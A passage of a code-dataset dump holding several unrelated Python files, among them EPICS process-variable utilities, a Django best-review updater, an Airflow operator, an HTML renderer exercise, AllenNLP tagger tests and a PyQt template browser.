'AlarmSeverity',\n ]\n\nlogger = logging.getLogger(__name__)\n\n\nclass BadPVName(ValueError, OpException):\n ...\n\n\nclass AlarmSeverity(IntEnum):\n NO_ALARM = 0\n MINOR = 1\n MAJOR = 2\n INVALID = 3\n\n\nclass AlarmStatus(IntEnum):\n NO_ALARM = 0\n READ = 1\n WRITE = 2\n HIHI = 3\n HIGH = 4\n LOLO = 5\n LOW = 6\n STATE = 7\n COS = 8\n COMM = 9\n TIMEOUT = 10\n HWLIMIT = 11\n CALC = 12\n SCAN = 13\n LINK = 14\n SOFT = 15\n BAD_SUB = 16\n UDF = 17\n DISABLE = 18\n SIMM = 19\n READ_ACCESS = 20\n WRITE_ACCESS = 21\n\n\ndef validate_pv_name(pv):\n '''Validates that there is not more than 1 '.' in pv\n\n Parameters\n ----------\n pv : str\n The pv to check\n\n Raises\n ------\n BadPVName\n '''\n if pv.count('.') > 1:\n raise BadPVName(pv)\n\n\ndef split_record_field(pv):\n '''Splits a pv into (record, field)\n\n Parameters\n ----------\n pv : str\n the pv to split\n\n Returns\n -------\n record : str\n field : str\n '''\n if '.' in pv:\n record, field = pv.rsplit('.', 1)\n else:\n record, field = pv, ''\n\n return record, field\n\n\ndef strip_field(pv):\n '''Strip off the field from a record'''\n return split_record_field(pv)[0]\n\n\ndef record_field(record, field):\n '''Given a record and a field, combine them into\n a pv of the form: record.FIELD\n '''\n record = strip_field(record)\n return '%s.%s' % (record, field.upper())\n\n\nclass MonitorDispatcher(epics.ca.CAThread):\n '''A monitor dispatcher which works with pyepics\n\n The monitor dispatcher works around having callbacks from libca threads.\n Using epics CA calls (caget, caput, etc.) from those callbacks is not\n possible without this dispatcher workaround.\n\n ... note::\n\n Without `all_contexts` set, only the callbacks that are run with\n the same context as the the main thread are affected.\n\n ... note::\n\n Ensure that you call epics.ca.use_initial_context() at startup in\n the main thread\n\n Parameters\n ----------\n all_contexts : bool, optional\n re-route _all_ callbacks from _any_ context to the dispatcher callback\n thread\n timeout : float, optional\n callback_logger : logging.Logger, optional\n A logger to notify about failed callbacks\n\n Attributes\n ----------\n main_context : ctypes long\n The main CA context\n callback_logger : logging.Logger\n A logger to notify about failed callbacks\n queue : Queue\n The event queue\n '''\n\n def __init__(self, all_contexts=False, timeout=0.1,\n callback_logger=None):\n epics.ca.CAThread.__init__(self, name='monitor_dispatcher')\n\n self.daemon = True\n self.queue = queue.Queue()\n\n # The dispatcher thread will stop if this event is set\n self._stop_event = threading.Event()\n self.main_context = epics.ca.current_context()\n self.callback_logger = callback_logger\n\n self._all_contexts = bool(all_contexts)\n self._timeout = timeout\n\n self.start()\n\n def run(self):\n '''The dispatcher itself'''\n self._setup_pyepics(True)\n\n while not self._stop_event.is_set():\n try:\n callback, args, kwargs = self.queue.get(True, self._timeout)\n except queue.Empty:\n pass\n else:\n try:\n callback(*args, **kwargs)\n except Exception as ex:\n if self.callback_logger is not None:\n self.callback_logger.error(ex, exc_info=ex)\n\n self._setup_pyepics(False)\n epics.ca.detach_context()\n\n def stop(self):\n '''Stop the dispatcher thread and re-enable normal callbacks'''\n self._stop_event.set()\n\n def _setup_pyepics(self, enable):\n # Re-route monitor events to our new handler\n if enable:\n fcn = self._monitor_event\n else:\n fcn = epics.ca._onMonitorEvent\n\n epics.ca._CB_EVENT = ctypes.CFUNCTYPE(None, epics.dbr.event_handler_args)(fcn)\n\n def _monitor_event(self, args):\n if self._all_contexts or self.main_context == epics.ca.current_context():\n if callable(args.usr):\n if not hasattr(args.usr, '_disp_tag') or args.usr._disp_tag is not self:\n args.usr = lambda orig_cb=args.usr, **kwargs: \\\n self.queue.put((orig_cb, [], kwargs))\n args.usr._disp_tag = self\n\n return epics.ca._onMonitorEvent(args)\n\n\ndef waveform_to_string(value, type_=str, delim=''):\n '''Convert a waveform that represents a string into an actual Python string\n\n Parameters\n ----------\n value\n The value to convert\n type_ : type, optional\n Python type to convert to\n delim : str, optional\n delimiter to use when joining string\n '''\n try:\n value = delim.join(chr(c) for c in value)\n except TypeError:\n value = type_(value)\n\n try:\n value = value[:value.index('\\0')]\n except (IndexError, ValueError):\n pass\n\n return value\n\n\ndef get_pv_form():\n '''Get the PV form that should be used for pyepics\n\n Due to a bug in certain versions of PyEpics, form='time' cannot be used\n with some large arrays.\n\n native: gives time.time() timestamps from this machine\n time: gives timestamps from the PVs themselves\n\n Returns\n -------\n {'native', 'time'}\n '''\n def _fix_git_versioning(in_str):\n return in_str.replace('-g', '+g')\n\n def _naive_parse_version(version):\n try:\n version = version.lower()\n\n # Strip off the release-candidate version number (best-effort)\n if 'rc' in version:\n version = version[:version.index('rc')]\n\n version_tuple = tuple(int(v) for v in version.split('.'))\n except:\n return None\n\n return version_tuple\n\n try:\n from pkg_resources import parse_version\n except ImportError:\n parse_version = _naive_parse_version\n\n version = parse_version(_fix_git_versioning(epics.__version__))\n\n if version is None:\n warnings.warn('Unrecognized PyEpics version; using local timestamps',\n ImportWarning)\n return 'native'\n\n elif version <= parse_version('3.2.3'):\n warnings.warn('PyEpics versions <= 3.2.3 will use local timestamps (version: %s)' %\n epics.__version__,\n ImportWarning)\n return 'native'\n else:\n return 'time'\n\n\npv_form = get_pv_form()\n\n\ndef records_from_db(fn):\n '''Naively parse db/template files looking for record names\n\n Returns\n -------\n records : list\n [(record type, record name), ...]\n '''\n\n ret = []\n for line in open(fn, 'rt').readlines():\n line = line.strip()\n\n if line.startswith('#'):\n continue\n\n if not (line.startswith('record') or line.startswith('grecord')):\n continue\n\n if '(' not in line:\n continue\n\n line = line[line.index('(') + 1:]\n if ',' not in line:\n continue\n\n rtype, record = line.split(',', 1)\n rtype = rtype.strip()\n record = record.strip()\n\n if record.startswith('\"'):\n # Surrounded by quotes, easy to parse\n record = record[1:]\n record = record[:record.index('\"')]\n else:\n # No quotes, and macros may contain parentheses\n # Find the first non-matching parenthesis and\n # that should denote the end of the record name\n #\n # $(P)$(R)Record)\n # ^\n\n in_paren = 0\n for i, c in enumerate(record):\n if c == '(':\n in_paren += 1\n elif c == ')':\n in_paren -= 1\n\n if in_paren < 0:\n record = record[:i]\n break\n\n ret.append((rtype, record))\n\n return ret\n\n\ndef raise_if_disconnected(fcn):\n '''Decorator to catch attempted access to disconnected EPICS channels.'''\n @functools.wraps(fcn)\n def wrapper(self, *args, **kwargs):\n if self.connected:\n return fcn(self, *args, **kwargs)\n else:\n raise DisconnectedError('{} is not connected'.format(self.name))\n return wrapper\n\n\ndef set_and_wait(signal, val, poll_time=0.01, timeout=10, rtol=None,\n atol=None):\n \"\"\"Set a signal to a value and wait until it reads correctly.\n\n For floating point values, it is strongly recommended to set a tolerance.\n If tolerances are unset, the values will be compared exactly.\n\n Parameters\n ----------\n signal : EpicsSignal (or any object with `get` and `put`)\n val : object\n value to set signal to\n poll_time : float, optional\n how soon to check whether the value has been successfully set\n timeout : float, optional\n maximum time to wait for value to be successfully set\n rtol : float, optional\n allowed absolute tolerance between the readback and setpoint values\n atol : float, optional\n allowed relative tolerance between the readback and setpoint values\n\n Raises\n ------\n TimeoutError if timeout is exceeded\n \"\"\"\n if atol is None and hasattr(signal, 'tolerance'):\n atol = signal.tolerance\n if rtol is None and hasattr(signal, 'rtolerance'):\n rtol = signal.rtolerance\n\n signal.put(val)\n expiration_time = ttime.time() + timeout if timeout is not None else None\n current_value = signal.get()\n try:\n es = signal.enum_strs\n except AttributeError:\n es = ()\n\n if atol is not None:\n within_str = ['within {!r}'.format(atol)]\n else:\n within_str = []\n\n if rtol is not None:\n within_str.append('(relative tolerance of {!r})'.format(rtol))\n\n if within_str:\n within_str = ' '.join([''] + within_str)\n else:\n within_str = ''\n\n while not _compare_maybe_enum(val, current_value, es, atol, rtol):\n logger.info(\"Waiting for %s to be set from %r to %r%s...\",\n signal.name, current_value, val, within_str)\n ttime.sleep(poll_time)\n if poll_time < 0.1:\n poll_time *= 2 # logarithmic back-off\n current_value = signal.get()\n if expiration_time is not None and ttime.time() > expiration_time:\n raise TimeoutError(\"Attempted to set %r to value %r and timed \"\n \"out after %r seconds. Current value is %r.\" %\n (signal, val, timeout, current_value))\n\n\ndef _compare_maybe_enum(a, b, enums, atol, rtol):\n if enums:\n # convert enum values to strings if necessary first:\n if not isinstance(a, str):\n a = enums[a]\n if not isinstance(b, str):\n b = enums[b]\n # then compare the strings\n return a == b\n\n # if either relative/absolute tolerance is used, use numpy\n # to compare:\n if atol is not None or rtol is not None:\n return np.allclose(a, b,\n rtol=rtol if rtol is not None else 1e-5,\n atol=atol if atol is not None else 1e-8,\n )\n return a == b\n\n\n_type_map = {'number': (float, ),\n 'array': (np.ndarray, ),\n 'string': (str, ),\n 'integer': (int, ),\n }\n\n\ndef data_type(val):\n '''Determine data-type of val.\n\n Returns\n -------\n str\n One of ('number', 'array', 'string'), else raises ValueError\n '''\n for json_type, py_types in _type_map.items():\n if type(val) in py_types:\n return json_type\n # no legit type found...\n raise ValueError('{} not a valid type (int, float, ndarray, str)'.format(val))\n\n\ndef data_shape(val):\n '''Determine data-shape (dimensions)\n\n Returns\n -------\n list\n Empty list if val is number or string, otherwise\n ``list(np.ndarray.shape)``\n '''\n for json_type, py_types in _type_map.items():\n if type(val) in py_types:\n if json_type is 'array':\n return list(val.shape)\n else:\n return list()\n raise ValueError('Cannot determine shape of {}'.format(val))\n","sub_path":"ophyd/utils/epics_pvs.py","file_name":"epics_pvs.py","file_ext":"py","file_size_in_byte":12850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62259237","text":"from django.core.management.base import BaseCommand\nfrom apps.review.models import MajorBestReview, HumanityBestReview, Review\nfrom datetime import timedelta\nfrom django.utils import timezone\nimport random\n\n\nclass Command(BaseCommand):\n help = \"BestReview Changer\"\n\n def handle(self, *args, **options):\n print(\"BestReview changing start!\")\n latest_date_end = timezone.now()\n latest_date_start = timezone.now() - timedelta(days=7)\n\n def get_key(r):\n base_year = timezone.now().year\n lecture_year = r.lecture.year\n year_diff = base_year - lecture_year if (base_year > lecture_year) else 0\n return int(r.like / float(r.lecture.audience + 1) * (0.85 ** year_diff))\n\n def get_best_reviews(reviews, min_liked_count, max_result_count):\n liked_count = max(min_liked_count, len(reviews) // 10)\n most_liked_reviews = sorted(list(reviews), key=get_key, reverse=True)[:liked_count]\n\n latest_reviews = list(reviews.filter(written_datetime__range=(latest_date_start, latest_date_end)))\n\n best_candidate_reviews = most_liked_reviews + latest_reviews\n if len(best_candidate_reviews) > max_result_count:\n result_reviews = random.sample(best_candidate_reviews, k=max_result_count)\n else:\n result_reviews = best_candidate_reviews\n\n return result_reviews\n\n humanity_reviews = Review.objects.filter(course__department__code=\"HSS\")\n\n humanity_best_reviews = get_best_reviews(humanity_reviews, 50, 20)\n\n HumanityBestReview.objects.all().delete()\n for r in humanity_best_reviews:\n HumanityBestReview.objects.create(review=r)\n\n major_reviews = Review.objects.exclude(course__department__code=\"HSS\")\n\n major_best_reviews = get_best_reviews(major_reviews, 2000, 1000)\n\n MajorBestReview.objects.all().delete()\n for r in major_best_reviews:\n MajorBestReview.objects.create(review=r)\n\n print(\"BestReview was changed\")\n","sub_path":"apps/review/management/commands/update-best-reviews.py","file_name":"update-best-reviews.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"181149013","text":"import json\nimport os\n\n\nclass StudentManager:\n #The actual path of the file we want to manage\n def __init__(self, filePath=''):\n self.filePath = filePath\n \n def getAllStudents(self):\n self.students = []\n try:\n with open(self.filePath, 'r') as file:\n self.students = json.load(file)\n return self.students\n except: return None\n\n def getAllNotes(self, folderName):\n myStd = self.getAllStudents()\n for folder in myStd:\n if folder[\"name\"]==folderName:\n return folder[\"notes\"]\n \n def addStudent(self, student):\n #Gets the info of the Student as a dict (we can change the name if it's confusing because it's a dict actually)\n self.data = student\n newData = []\n #dumps the data into JSON file\n try:\n if os.stat(self.filePath).st_size > 0:\n with open(self.filePath, 'r') as f: #reads actual students on json file\n newData=json.load(f)\n newData.append(self.data) #appends new student\n else: newData = [self.data]\n with open(self.filePath, 'w', newline='\\n') as f: #overwrites json file with new student, this keeps the json format\n json.dump(newData, f, indent=4)\n except: return 'ERROR' #If nothing gets returned, the process was a success, otherwise return something\n \n \n","sub_path":"Online/Noten/Cruz_Elian_Practica_12_StudentManager.py","file_name":"Cruz_Elian_Practica_12_StudentManager.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"399068199","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadDimensionOperator(BaseOperator):\n\n ui_color = '#80BD9E'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id = \"\",\n create_sql_stmt = \"\",\n replace = True,\n table = \"\",\n *args, **kwargs):\n\n super(LoadDimensionOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.create_sql_stmt = create_sql_stmt\n self.table = table\n self.replace = replace\n\n def execute(self, context):\n redshift_conn = PostgresHook(postgres_conn_id = self.redshift_conn_id)\n\n if replace:\n redshift_conn.run(f\"DELETE * FROM {self.table}\")\n self.log.info(f\"Existing {self.table} table deleted ready for replace operation\")\n\n redshift_conn.run(self.create_sql_stmt)\n self.log.info(f\"{self.table} successfully loaded in {self.apprend_or_replace} operation\")\n","sub_path":"plugins/operators/load_dimension.py","file_name":"load_dimension.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"213097132","text":"class Element:\n indentation = \" \"\n tag = \"\"\n\n def __init__(self, content=None, **kwargs):\n self.kwargs = kwargs\n if content is None:\n self.content = []\n else:\n self.content = [content]\n\n\n def append(self, string):\n self.content.append(string)\n\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(' {}=\"{}\"'.format(i,j))\n fileout.write(\">\\n\")\n #\n for obj in self.content:\n if isinstance(obj, Element):\n obj.render(fileout, cur_ind + self.indentation)\n else:\n fileout.write(cur_ind + f' {obj}')\n fileout.write(\"\\n\")\n fileout.write(cur_ind + \"\\n\".format(self.tag))\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Html(Element):\n tag = 'html'\n\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(\"\\n\")\n Element.render(self, fileout, cur_ind=\"\")\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Body(Element):\n tag = 'body'\n\n\nclass P(Element):\n tag = 'p'\n\n\nclass Head(Element):\n tag = \"head\"\n\n\nclass OneLineTag(Element):\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(f'{i} {\"=\"} {j}')\n fileout.write(\">\")\n for obj in self.content:\n if isinstance(obj, Element):\n obj.render(fileout, cur_ind + self.indentation)\n else:\n fileout.write(cur_ind + f' {obj}')\n fileout.write(cur_ind + \"\\n\".format(self.tag))\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Title(OneLineTag):\n tag = \"title\"\n\n\nclass SelfClosingTag(Element):\n def __init__(self, content=None, **kwargs):\n if content is not None:\n raise TypeError(\"Self closing tag cannot have any content. Please remove them and try again!\")\n else:\n self.kwargs = kwargs\n\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(f'{i} {\"=\"} {j}')\n fileout.write(\" />\\n\")\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Hr(SelfClosingTag):\n tag = 'hr'\n\n\nclass Br(SelfClosingTag):\n tag = 'br'\n\n\nclass Meta(SelfClosingTag):\n tag = 'meta'\n\n\nclass A(Element):\n tag = 'a'\n\n def __init__(self, link, content):\n Element.__init__(self, content, href=link)\n\n def render(self, fileout, cur_ind = \" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(f'{i} {\"=\"} {j}')\n fileout.write(\" />\")\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Ul(Element):\n tag = 'ul'\n\n\nclass Li(Element):\n tag = 'li'\n\n\nclass H(OneLineTag):\n def __init__(self, level, content, **kwargs):\n OneLineTag.__init__(self, content, **kwargs)\n self.level = level\n self.tag = f'{\"h\"}{level}'\n\n","sub_path":"students/shibin_mathew/lesson7/html_render.py","file_name":"html_render.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635628108","text":"from pathlib import Path\n\nfrom flaky import flaky\nimport pytest\nfrom allennlp.common.testing import ModelTestCase\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.common.params import Params\nfrom allennlp.models import Model\n\nimport multitask_negation_target\nfrom multitask_negation_target.tests import util\n\n#\n# For the non-crf tagger version tests see shared_softmax_tagger_test.py\n#\n\nclass SharedCrfTaggerTest(ModelTestCase):\n DATA_DIR = util.FIXTURES_ROOT / \"allen\" / \"dataset_readers\" / \"negation_speculation\"\n MODEL_DIR = util.FIXTURES_ROOT / \"allen\" / \"models\" / \"shared_crf_tagger\"\n\n def setUp(self):\n super().setUp()\n self.shared_only_fp = self.MODEL_DIR / \"shared_only_experiment.jsonnet\"\n self.shared_model_fp = self.MODEL_DIR / \"experiment_shared_encoder.jsonnet\"\n self.shared_skip_connections_model_fp = self.MODEL_DIR / \"experiment_shared_encoder_skip_connections.jsonnet\"\n\n model_fp = self.MODEL_DIR / \"experiment.jsonnet\"\n data_fp = self.DATA_DIR / \"conan_doyle_data.conllu\"\n self.set_up_model(model_fp, data_fp,)\n\n def test_simple_tagger_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.param_file)\n \n def test_shared_tagger_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.shared_model_fp)\n \n def test_shared_only_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.shared_only_fp)\n \n def test_shared_and_skip_connections_tagger_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.shared_skip_connections_model_fp)\n\n @flaky\n def test_batch_predictions_are_consistent(self):\n self.ensure_batch_predictions_are_consistent()\n\n def test_forward_pass_runs_correctly(self):\n training_tensors = self.dataset.as_tensor_dict()\n output_dict = self.model(**training_tensors)\n tags = output_dict[\"tags\"]\n assert len(tags) == 2\n assert len(tags[0]) == 9\n assert len(tags[1]) == 18\n for example_tags in tags:\n for tag_id in example_tags:\n tag = self.model.vocab.get_token_from_index(tag_id, namespace=\"negation_labels\")\n assert tag in {\"O\", \"I_scope\", \"B_scope\", \"B_cue\"}\n\n def test_mismatching_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.param_file)\n # Make the encoder wrong - it should be 210 to match\n # the embedding dimension from the text_field_embedder.\n params[\"model\"][\"task_encoder\"][\"input_size\"] = 10\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n \n def test_mismatching_shared_encoder_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.shared_model_fp)\n # Make the shared encoder wrong - it should be 210 to match\n # the embedding dimension from the text_field_embedder.\n params[\"model\"][\"shared_encoder\"][\"input_size\"] = 10\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n \n def test_mismatching_task_encoder_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.shared_model_fp)\n # Make the task encoder wrong - it should be 600 to match the shared \n # encoder\n params[\"model\"][\"task_encoder\"][\"input_size\"] = 590\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_task_and_shared_is_required(self):\n params = Params.from_file(self.shared_only_fp)\n del params[\"model\"][\"shared_encoder\"]\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_shared_cannot_have_skip(self):\n params = Params.from_file(self.shared_only_fp)\n params[\"model\"][\"skip_connections\"] = True\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_mismatching_skip_connections_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.shared_skip_connections_model_fp)\n # Make the task encoder wrong - it should be 810 to match the shared \n # encoder\n params[\"model\"][\"task_encoder\"][\"input_size\"] = 600\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_skip_connections_value(self):\n # If a model does not have a shared encoder and the skip connections is \n # True should raise a ValueError\n params = Params.from_file(self.param_file)\n params[\"model\"][\"skip_connections\"]= True\n with pytest.raises(ValueError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))","sub_path":"multitask_negation_target/tests/allen/models/shared_crf_tagger_test.py","file_name":"shared_crf_tagger_test.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533571414","text":"import PySimpleGUI as sg\n\n\ndef main_layout(condo_dict: dict) -> list:\n \"\"\"\n Layout for the main window, needs the condo dict to show all condos\n \"\"\"\n layout = [\n [sg.Checkbox(\"Seleziona tutti\", default=True, key=\"-TUTTI-\", enable_events=True)],\n [sg.Frame(\"Seleziona i tracciati da scaricare\", layout=[[sg.Col(layout=[[sg.Checkbox(\"896\", default=True, key=(\"896\", x))] + \n [sg.Checkbox(\"CBI\", default=True, key=(\"CBI\", x))] + \n [sg.T(x, pad=(5, 0))] for x in condo_dict.keys()],\n scrollable=True, vertical_scroll_only=True, size=(650, 700))]])\n ],\n [sg.ProgressBar(100, orientation=\"horizontal\", style=\"winnative\", key=\"-BAR-\", size=(20, 20)), sg.T(\"In attesa...\", key=\"-MESSAGE-\", size=(40, 2), font=\"Consolas 12\")],\n [sg.Button(\"Scarica selezionati\", key=\"-SCARICA-\")]\n ]\n return layout\n\n\ndef update_bar_message(message: str, counter: int, window: sg.Window):\n \"\"\"\n Updates progress bar and output message, returns counter +1\n \"\"\"\n msg = window[\"-MESSAGE-\"]\n bar = window[\"-BAR-\"]\n counter += 1\n bar.update_bar(counter)\n msg.update(message)\n window.refresh()\n return counter\n\ndef permute_checkboxes(window: sg.Window, values: dict):\n new_value = values[\"-TUTTI-\"]\n checkboxes = [window[key] for key in values if isinstance(key, tuple) and key[0] in (\"896\", \"CBI\")]\n for cb in checkboxes:\n cb.update(new_value)","sub_path":"application/gui/layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"123521248","text":"#!/usr/bin/env python\n__all__ = ['eis_browse_templates']\n\nimport sys\nimport os\nimport numpy as np\nimport shutil\nfrom PyQt5 import Qt, QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon, QPixmap, QImage\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom eispac.templates import eis_find_templates\n\nclass Top(QWidget):\n\n def __init__(self, eis):\n super().__init__()\n self.eis = eis\n self.default_dir = 'eis_template_dir'\n self.font_default = QtGui.QFont(\"Courier\", 12)\n self.font_small = QtGui.QFont(\"Courier\", 10)\n self.winNX = 1458\n self.winNY = 614\n self.leftNX = 450\n\n self.initUI()\n\n def initUI(self):\n self.buttonQuit = QPushButton('Quit')\n self.buttonQuit.setFont(self.font_default)\n self.buttonQuit.clicked.connect(self.on_click_button_quit)\n self.buttonQuit.resize(self.leftNX, self.frameGeometry().height())\n\n self.buttonSelect = QPushButton('Select a header file')\n self.buttonSelect.setFont(self.font_default)\n self.buttonSelect.clicked.connect(self.on_click_button_select)\n self.buttonSelect.resize(self.leftNX, self.frameGeometry().height())\n\n self.fileLabel = QLabel()\n self.fileLabel.setFont(self.font_default)\n self.fileLabel.setAlignment(Qt.AlignCenter)\n self.fileLabel.resize(self.leftNX, self.fileLabel.frameGeometry().height())\n self.setup_file_label()\n\n self.listTemplates = QListWidget()\n self.listTemplates.setFont(self.font_default)\n self.listTemplates.clicked.connect(self.on_click_list_templates)\n self.setup_list()\n\n self.buttonCopy = QPushButton('Copy Template to Local Dir')\n self.buttonCopy.setFont(self.font_default)\n self.buttonCopy.clicked.connect(self.on_click_button_copy)\n self.buttonCopy.resize(self.leftNX, self.buttonCopy.frameGeometry().height())\n\n self.textWindow = QTextEdit()\n self.textWindow.setFont(self.font_small)\n info = ('* Select an EIS HDF header file.\\n\\n'\n +'* Templates relevant to that file will be listed.\\n\\n'\n +'* Make a selection to display the template applied to some'\n +' represenative solar spectra.\\n\\n'\n +'* Use the copy button to copy the template file to a local'\n +' directory.\\n\\n'\n +'* You only need to copy one file for the template of a'\n ' multi-component fit. All components are listed separately.')\n self.textWindow.append(info+'\\n')\n self.textWindow.setReadOnly(True)\n self.textWindow.resize(self.leftNX, self.textWindow.frameGeometry().height())\n\n self.window = QLabel()\n buff = np.zeros((self.winNX, self.winNX, 3), dtype=np.int16)\n image = QImage(buff, self.winNX, self.winNY, QImage.Format_ARGB32)\n self.window.setPixmap(QPixmap(image))\n\n vbox1 = QVBoxLayout()\n vbox1.addWidget(self.buttonQuit)\n vbox1.addWidget(self.buttonSelect)\n vbox1.addWidget(self.fileLabel)\n vbox1.addWidget(self.listTemplates)\n vbox1.addWidget(self.buttonCopy)\n vbox1.addWidget(self.textWindow)\n vbox1.addStretch()\n\n vbox2 = QVBoxLayout()\n vbox2.addWidget(self.window)\n\n hbox = QHBoxLayout()\n hbox.addLayout(vbox1)\n hbox.addLayout(vbox2)\n\n self.setLayout(hbox)\n\n # --- display the widget\n self.setWindowTitle('Select EIS Fitting Template')\n self.show()\n\n def setup_list(self):\n if self.eis.text_list is not None:\n self.listTemplates.clear()\n self.listTemplates.addItems(self.eis.text_list)\n self.listTemplates.setFont(self.font_default)\n count = self.listTemplates.count()\n if count == 0: count = 2\n if count > 15: count = 15\n nrows = self.listTemplates.sizeHintForRow(0)*count + \\\n 2*self.listTemplates.frameWidth() + 5\n # self.listTemplates.setFixedSize(400, nrows)\n self.listTemplates.resize(self.leftNX, nrows)\n\n def setup_file_label(self):\n if self.eis.filename_head is not None:\n f = os.path.basename(self.eis.filename_head)\n f = f.split('.')[0]\n s = ('Selected header: '+f+'\\n'\n +'--- Available Templates ---\\n'\n +'filename, window num, wmin, wmax')\n self.fileLabel.setText(s)\n else:\n self.fileLabel.setText('No file has been selected')\n\n def on_click_button_quit(self):\n # --- quit the app\n QApplication.instance().quit()\n\n def on_click_button_copy(self):\n item = self.listTemplates.currentItem()\n index = self.listTemplates.indexFromItem(item)\n n = index.row()\n template_file = self.eis.template_list[n][0]\n\n if not os.path.isdir(self.default_dir):\n os.mkdir(self.default_dir)\n s = f'created {self.default_dir}'\n print(s)\n self.textWindow.append(s)\n\n shutil.copy2(template_file, self.default_dir)\n\n s = f'copied {os.path.basename(template_file)} to {self.default_dir}'\n print(s)\n self.textWindow.append(s)\n\n def on_click_button_select(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n eis_filename, _ = QFileDialog.getOpenFileName(self, 'Select a file',\n filter='*.head.h5',\n options=options)\n if os.path.isfile(eis_filename):\n self.eis = eis_find_templates(eis_filename, ignore_local=True)\n self.setup_list()\n self.setup_file_label()\n self.set_blank_image()\n\n def on_click_list_templates(self):\n item = self.listTemplates.currentItem()\n index = self.listTemplates.indexFromItem(item)\n n = index.row()\n image_file = self.eis.template_list[n][0].replace('.h5', '.jpg')\n self.display_image(image_file)\n\n def display_image(self, image_file):\n if os.path.isfile(image_file):\n pixmap = QPixmap(image_file)\n pixmap = pixmap.scaled(self.winNX, self.winNY)\n self.window.setPixmap(pixmap)\n\n def set_blank_image(self):\n buff = np.zeros((self.winNX, self.winNX, 3), dtype=np.int16)\n image = QImage(buff, self.winNX, self.winNY, QImage.Format_ARGB32)\n self.window.setPixmap(QPixmap(image))\n\ndef eis_browse_templates():\n # check the input\n if len(sys.argv) > 1:\n eis_filename = sys.argv[1]\n else:\n eis_filename = None\n\n # create the object that actually finds the templates\n eis = eis_find_templates(eis_filename, ignore_local=True)\n\n app = QApplication(sys.argv)\n ex = Top(eis)\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n eis_browse_templates()\n","sub_path":"scripts/eis_browse_templates.py","file_name":"eis_browse_templates.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"201762376","text":"#w3resources a bit more basic. \n\n# 1. current date and time.\n\nimport time\n\nlocaltime = time.asctime(time.localtime(time.time()))\nprint(\"nå er klokken: \", localtime)\n\n\n#2. area of a circle. \n\nimport math \n\nuserInput = int(input(\"Write the radius of your circle:..\"))\n\narea = math.pi * userInput**2 \nprint(\"the area is: \", area)\n\n# 3. print name in reverse order. \n\nfirst = input(\"write your first name: \") \nlast = input(\"write your last name: \")\n\nprint(\"hi \" + last +\" \" + first)\n\n#4. split input. \n\nfilename = input(\"write the whole filename: \")\ntheExstention = filename.split(\".\")\nprint(\"the exstention of the file \" + repr(theExstention[-1])) \n\n#5 output tuples\n\nstring1 = \"3,5,7,23\"\nsplit = string1.split(\",\")\ntuple = tuple(split)\nprint(split)\nprint(tuple)\n\n# edit a 